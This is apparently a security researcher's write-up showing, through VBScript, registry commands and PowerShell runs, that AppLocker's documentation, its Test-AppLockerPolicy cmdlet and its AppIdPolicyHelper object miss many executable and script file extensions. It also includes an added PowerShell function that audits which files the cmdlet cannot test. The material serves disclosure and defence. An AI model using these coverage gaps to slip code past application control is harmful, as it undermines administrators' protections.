Const FILE_TYPE_DLL = 2
Const FILE_TYPE_WINDOWS_INSTALLER = 3
Const FILE_TYPE_SCRIPT = 4
With WScript.CreateObject("AppIdPolicyEngineApi.AppIdPolicyHelper")
WScript.Echo .GetFileType(WScript.ScriptName) & vbTab & WScript.ScriptName
WScript.Echo .GetFileType(WScript.FullName) & vbTab & WScript.FullName
WScript.Echo .GetFileType(WScript.Path) & vbTab & WScript.Path
WScript.Echo
WScript.Echo .GetFileRuleCollection(FILE_TYPE_EXE) & vbTab & .GetFileExtensions(FILE_TYPE_EXE)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_DLL) & vbTab & .GetFileExtensions(FILE_TYPE_DLL)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_WINDOWS_INSTALLER) & vbTab & .GetFileExtensions(FILE_TYPE_WINDOWS_INSTALLER)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_SCRIPT) & vbTab & .GetFileExtensions(FILE_TYPE_SCRIPT)
WScript.Echo
WScript.Echo WScript.ScriptName & " = " & .NormalizeFilePath(WScript.ScriptName)
WScript.Echo WScript.FullName & " = " & .NormalizeFilePath(WScript.FullName)
WScript.Echo
WScript.Echo Hash2Text(.CalculateFileHash(WScript.ScriptName))
WScript.Echo Hash2Text(.CalculateFileHash(WScript.FullName))
WScript.Echo
WScript.Echo .DecodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US")
WScript.Echo .EncodeFilePublisherInformation("CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US", vbTrue)
WScript.Echo
WScript.Echo .CompileRule("<FilePathRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-5-32-544'><Conditions><FilePathCondition Path='*' /></Conditions></FilePathRule>")
WScript.Echo .CompileRule("<FilePublisherRule Action='Allow' Description='' Id='00000000-0000-0000-0000-000000000000' Name='' UserOrGroupSid='S-1-1-0'><Conditions><FilePublisherCondition BinaryName='*' ProductName='*' PublisherName='CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US'><BinaryVersionRange HighSection='65535.65535.65535.65535' LowSection='0.0.0.0' /></FilePublisherCondition></Conditions></FilePublisherRule>")
End With
Function Hash2Text(Hash)
Dim int, asc, str
For int = 1 To LenB(Hash)
asc = AscB(MidB(Hash, int, 1))
If asc < 16 Then str = str & "0"
str = str & Hex(asc)
Next
Hash2Text = str
End Function
Register the missing ProgIDs AppIdPolicyEngineApi.AppIdPolicyHelper and AppIdPolicyEngineApi.AppIdPolicyHelper.1, then execute the VBScript whisper.vbs overwritten in step 7. to demonstrate the helper methods again:
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper\CurVer /VE /T REG_SZ /D AppIdPolicyEngineApi.AppIdPolicyHelper.1
REG.EXE ADD HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper.1\CLSID /VE /T REG_SZ /D {0AEA3667-1039-43FF-8D21-B1A162090671}
CSCRIPT.EXE whisper.vbs
The operation completed successfully.
The operation completed successfully.
Microsoft (R) Windows Script Host, Version 5.8
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
4 whisper.vbs
1 C:\Windows\System32\cscript.exe
0 C:\Windows\System32
Exe com,exe
Dll dll
Msi msi,msp
Script bat,cmd,js,ps1,vbs
whisper.vbs = %OSDRIVE%\USERS\STEFAN\DESKTOP\WHISPER.VBS
C:\Windows\System32\cscript.exe = %SYSTEM32%\CSCRIPT.EXE
60E51D76C652B4DFA204BDCA182818EA42B67F8BC11B344A87C0B6CB9CF919F2
0A242026DA1DF243E88C2D56FC7A77CF04F65513075968F010E213046E64465E
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
D:(XA;;FX;;;BA;(APPID://PATH Contains "*"))
D:(XA;;FX;;;WD;((Exists APPID://FQBN) && ((APPID://FQBN >= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 0}) && (APPID://FQBN <= {"CN=MICROSOFT CORPORATION, O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*\*", 18446744073709551615}))))
An AppLocker rule collection is a set of rules that apply to one of five types:
Executable files: .exe and .com
Windows Installer files: .msi, .mst and .msp
Scripts: .ps1, .bat, .cmd, .vbs, and .js
DLLs: .dll and .ocx
Packaged apps and Packaged app installers: .appx
OUCH¹: this documentation fails to enumerate at least the well-known file extensions .scr for screen saver executables, .msix for Windows Installer files, .vbe, .jse, .wsc, .wsf, .wsh and .sct for scripts, plus .acm, .ax, .drv, .ime, .mui, .tsp, .wll, .xll and .cpl for DLLs!
OUCH²: at least executable files, script files run by Windows Script Host and DLLs may have an arbitrary or no file extension at all!
The documentation for the Test-AppLockerPolicy PowerShell cmdlet specifies:
The Test-AppLockerPolicy cmdlet uses the specified AppLocker policy to test whether a specified list of files are allowed to run on the local computer for a specific user.
Syntax
Test-AppLockerPolicy [-PolicyObject] <AppLockerPolicy> [-Path <String[]>] [-User <String>] [-Filter <PolicyDecision[]>] [<CommonParameters>]
Test-AppLockerPolicy [-XMLPolicy] <String> [-Path <String>] [-User <String>] [-Filter <FilterType>] [<CommonParameters>]
Parameters
Parameter Description
PolicyObject <AppLockerPolicy> Specifies the policy object that contains the AppLocker policy. It can be obtained from the Get-AppLockerPolicy or New-AppLockerPolicy cmdlet.
XMLPolicy <String> The XML file path that contains the AppLocker policy.
Path <String[]> Specifies the list of file paths to test. Supports regular expressions.
User <String> Defines the user or group that the rules are applied to. You must provide one of the following property values:
- DNS user name (domain\username)
- User principal name (username@domain.com)
- Security identifier (S-1-5-21-3165297888-301567370-576410423-1103)
- SAM user name (username)
Filter <PolicyDecision[]> Filters the output by the policy decision for each input file. The policy decision options include: All, Allowed, Denied, DeniedByDefault, and AllowedByDefault. By default, all policy decisions are displayed.
CAVEAT: this documentation specifies neither preconditions nor restrictions for the file paths to test!
Test-AppLockerPolicy cmdlet and its cause.
Create the text file whisper.xml with the following content in an arbitrary, preferably empty directory:
<?xml version='1.0' encoding='US-ASCII' standalone='yes' ?>
<AppLockerPolicy Version='1' />
Test file paths with the 12 file extensions specified in the first documentation cited above against the empty "allow all" AppLocker policy whisper.xml created in step 1.:
PowerShell.exe /Command "Import-Module AppLocker; Test-AppLockerPolicy -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx"
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.exe" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.exe:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.com" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.com:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.msi" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.msi:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.mst" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.mst:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.msp" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.msp:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.ps1" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.ps1:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.bat" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.bat:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.cmd" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.cmd:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.vbs" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.vbs:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.js" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.js:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.dll" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.dll:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The path "C:\Users\Stefan\Desktop\whisper.ocx" can not be found, it does not exist.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : InvalidArgument: (whisper.ocx:String) [Test-AppLockerPolicy], ItemNotFoundException
+ FullyQualifiedErrorId : CmdletHelper-FailedResolvingPSPath,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
OUCH¹: the Test-AppLockerPolicy cmdlet requires the files to exist unconditionally, even for an (empty) AppLocker policy without file hash or publisher rules!
Create the files to test with arbitrary content, then repeat the command from step 2.:
FOR %? IN (whisper.exe whisper.com whisper.msi whisper.mst whisper.msp whisper.ps1 whisper.bat whisper.cmd whisper.vbs whisper.js whisper.dll whisper.ocx) DO @(1>%? ECHO %?)
PowerShell.exe /Command "Import-Module AppLocker; Test-AppLockerPolicy -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx"
FilePath PolicyDecision MatchingRule
-------- -------------- ------------
C:\Users\Stefan\Desktop\whisper.exe AllowedByDefault
C:\Users\Stefan\Desktop\whisper.com AllowedByDefault
C:\Users\Stefan\Desktop\whisper.msi AllowedByDefault
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.mst is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
C:\Users\Stefan\Desktop\whisper.msp AllowedByDefault
C:\Users\Stefan\Desktop\whisper.ps1 AllowedByDefault
C:\Users\Stefan\Desktop\whisper.bat AllowedByDefault
C:\Users\Stefan\Desktop\whisper.cmd AllowedByDefault
C:\Users\Stefan\Desktop\whisper.vbs AllowedByDefault
C:\Users\Stefan\Desktop\whisper.js AllowedByDefault
C:\Users\Stefan\Desktop\whisper.dll AllowedByDefault
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.ocx is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.exe, whisper.com, whisper.msi, whisper.mst, whisper.msp, whisper.ps1, whisper.bat, whisper.cmd, whisper.vbs, whisper.js, whisper.dll, whisper.ocx
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
OUCH²: the Test-AppLockerPolicy cmdlet fails to support the file extensions .mst and .ocx specified in the first documentation cited above!
Repeat the previous step 3. with (arbitrary) other file extensions, for example .scr, .vbe and .cpl mentioned above:
FOR %? IN (whisper.scr whisper.vbe whisper.cpl) DO @(1>%? ECHO %?)
PowerShell.exe /Command "Import-Module AppLocker; Test-AppLockerPolicy -XMLPolicy whisper.xml -Path whisper.scr, whisper.vbe, whisper.cpl"
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.scr is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.src, whisper.vbe, whisper.cpl
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.vbe is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.scr, whisper.vbe, whisper.cpl
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Test-AppLockerPolicy : The file C:\Users\Stefan\Desktop\whisper.cpl is not supported by AppLocker. The supported file types are Exe, Dll, Windows Installer, and Script.
At line:1 char:46
+ Import-Module AppLocker; Test-AppLockerPolicy <<<< -XMLPolicy whisper.xml -Path whisper.scr, whisper.vbe, whisper.cpl
+ CategoryInfo : NotSpecified: (:) [Test-AppLockerPolicy], UnsupportedFileTypeException
+ FullyQualifiedErrorId : TestAppLockerPolicyCmdlet-FailedProcessingFile,Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.TestAppLockerPolicyCmdlet
Create the text file whisper.wsf with the following
content in the same directory:
<?xml version='1.0' encoding='US-ASCII' standalone='yes' ?>
<job>
<object id='AppIdPolicyHelper' classid='clsid:0AEA3667-1039-43FF-8D21-B1A162090671' />
<script language='VBScript'>
<![CDATA[
Option Explicit
Dim strExtension
For Each strExtension In Array(".scr", _
".vbe", ".jse", ".wsc", ".wsf", ".wsh", ".sct", _
".acm", ".ax", ".drv", ".ime", ".mui", ".tsp", ".wll", ".xll", ".cpl", _
".")
WScript.Echo AppIdPolicyHelper.GetFileType(strExtension) & vbTab & strExtension
Next
WScript.Quit 0
]]>
</script>
</job>
Execute the Windows Script File whisper.wsf created in step 5. to show the culprit responsible for the misbehaviour:
CSCRIPT.EXE whisper.wsf
Microsoft (R) Windows Script Host, Version 5.8
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
0 .scr
0 .vbe
0 .jse
0 .wsc
0 .wsf
0 .wsh
0 .sct
0 .acm
0 .ax
0 .drv
0 .ime
0 .mui
0 .tsp
0 .wll
0 .xll
0 .cpl
0 .
OUCH³: the GetFileType() helper method, used by the Test-AppLockerPolicy cmdlet to determine which rule collection to evaluate, returns 0 alias FILE_TYPE_NOT_SUPPORTED for any file extension except .exe, .com, .msi, .msp, .ps1, .bat, .cmd, .vbs, .js and .dll!
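As an added example that is not part of the original page, the following PowerShell function runs the same GetFileType() check over a whole directory and reports which files a Test-AppLockerPolicy run would reject as unsupported, i.e. which files never show up in its PolicyDecision report. It creates the helper from the CLSID shown above, so the missing ProgID need not be registered; the function name Get-AppLockerFileTypeCoverage and the $FileTypeNames table are this example's own assumptions, the CLSID and the FILE_TYPE values are those from the type library dump above.

```powershell
# Added example (not the page's own code): find the files in a directory tree
# that Test-AppLockerPolicy cannot evaluate because AppIdPolicyHelper's
# GetFileType() returns FILE_TYPE_NOT_SUPPORTED for their extension.
# Written for PowerShell 2.0 and later (no -File, no [pscustomobject]).

# Values of the FILE_TYPE enumeration from the type library shown above.
$FileTypeNames = @{
    0 = 'FILE_TYPE_NOT_SUPPORTED'
    1 = 'FILE_TYPE_EXE'
    2 = 'FILE_TYPE_DLL'
    3 = 'FILE_TYPE_WINDOWS_INSTALLER'
    4 = 'FILE_TYPE_SCRIPT'
}

function Get-AppLockerFileTypeCoverage {
    param(
        [Parameter(Mandatory = $true)] [string] $Directory,
        [switch] $Recurse
    )

    # Create the helper directly from its CLSID: the version-independent
    # ProgID AppIdPolicyEngineApi.AppIdPolicyHelper is missing on a stock
    # installation, so New-Object -ComObject would fail without the REG.EXE
    # registration shown above.
    $clsid  = [Guid] '0AEA3667-1039-43FF-8D21-B1A162090671'
    $helper = [Activator]::CreateInstance([Type]::GetTypeFromCLSID($clsid))

    Get-ChildItem -LiteralPath $Directory -Recurse:$Recurse |
        Where-Object { -not $_.PSIsContainer } |
        ForEach-Object {
            # GetFileType() judges by the file name extension alone (step 6.
            # above: ".scr", ".cpl", "." etc. return 0 although no such files
            # exist), so a missing or unlisted extension always comes back as 0.
            $type = [int] $helper.GetFileType($_.FullName)
            New-Object PSObject -Property @{
                Path       = $_.FullName
                Extension  = $_.Extension
                FileType   = $FileTypeNames[$type]
                # Test-AppLockerPolicy throws UnsupportedFileTypeException for
                # these, so they are silently absent from its report.
                Untestable = ($type -eq 0)
            }
        }
}

# Usage: summarise, per extension, what a Test-AppLockerPolicy run over
# %SystemRoot%\System32 would skip.
Get-AppLockerFileTypeCoverage -Directory "$env:SystemRoot\System32" -Recurse |
    Where-Object { $_.Untestable } |
    Group-Object Extension |
    Sort-Object Count -Descending |
    Select-Object Count, Name
```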
Windows Script Host provides an environment in which users can execute scripts in a variety of languages, languages that use a variety of object models to perform tasks.
Syntax
wscript [<scriptname>] [/b] [/d] [/e:<engine>] [{/h:cscript|/h:wscript}] [/i] [/job:<identifier>] [{/logo|/nologo}] [/s] [/t:<number>] [/x] [/?] [<ScriptArguments>]
Parameters
Parameter Description
… …
/logo Specifies that the Windows Script Host banner is displayed in the console before the script runs. This is the default and the opposite of /nologo.
/nologo Specifies that the Windows Script Host banner is not displayed before the script runs.
… …
ScriptArguments Specifies the arguments passed to the script. Each script argument must be preceded by a slash (/).
/? Displays Help at the command prompt.
OUCH¹: /logo alias //logo and /nologo alias //nologo have no function, their highlighted descriptions are misleading and wrong – the Windows Based Script Host WScript.exe never displays a banner!
OUCH²: contrary to the highlighted statement for ScriptArguments only named script arguments must be preceded by a (single) slash – unnamed script arguments must not be preceded by a slash!
OUCH³: instead of the help text at the command prompt the script host option /? alias //? displays the message box shown to the right!
Note: options for the script hosts can and of course should always be preceded by two slashes to distinguish them, and also be placed in front of the script filename, to separate them from (named) arguments for the script!